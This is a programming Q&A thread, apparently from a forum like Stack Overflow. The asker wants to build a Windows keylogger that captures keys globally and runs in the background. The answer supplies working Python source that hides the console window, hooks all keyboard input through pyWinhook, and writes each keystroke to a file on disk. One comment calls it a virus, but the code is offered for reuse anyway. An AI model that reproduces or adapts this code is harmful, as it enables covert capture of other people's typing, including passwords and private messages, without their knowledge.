# How do I read key asynchronously in Python for a keylogger?

Tags: python, asynchronous, keylogger

So I am making a Python keylogger, but I don't know of anything to asynchronously read keys being pressed, even when the window is not in focus. I've seen event.ASCII, but nothing came up for it specifically on Google.

As the other part, how do I keep the program running instead of running the script then quitting? I've used the Clock from Pygame, but I'm not sure how to do it in this situation.

So I guess I would just like to know if there is some module to do this and maybe an explanation of it.

I really appreciate any help with this topic.

P.S. If you care to answer, how do I make the program run in the background? I've done that in C++ but never python. Thanks again

Comment: Running background processes is not Python specific but system specific, what are you using ? Linux, Mac, Windows ?

Comment: the OS is important ... and its not as easy as it seems like it should be

Comment: pykeylogger on sourceforge is likely a good source for source.

Comment: Please tell us how to destroy the virus you are creating

Comment: I will check out pykeylogger, and I'm running windows.

Answer (score 0):

This is a piece of code I wrote long ago. You can use this as a reference.

```
import pyWinhook
import pythoncom
import win32console
import win32gui

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)


def onkeyboardevent(event):
    if event.Ascii == 5:
        exit(1)
    if event.Ascii != 0 or 8:
        f = open('c:/Users/hp/Downloads/output.txt', 'r+')
        buffer = f.read()
        f.close()
        f = open('c:/Users/hp/Downloads/output.txt', 'w')
        keylogs = chr(event.Ascii)
        if event.Ascii == 13:
            keylogs = '\n'
        buffer += keylogs
        f.write(str(buffer))
        f.close()
    return 0


hm = pyWinhook.HookManager()
hm.KeyDown = onkeyboardevent
hm.HookKeyboard()
```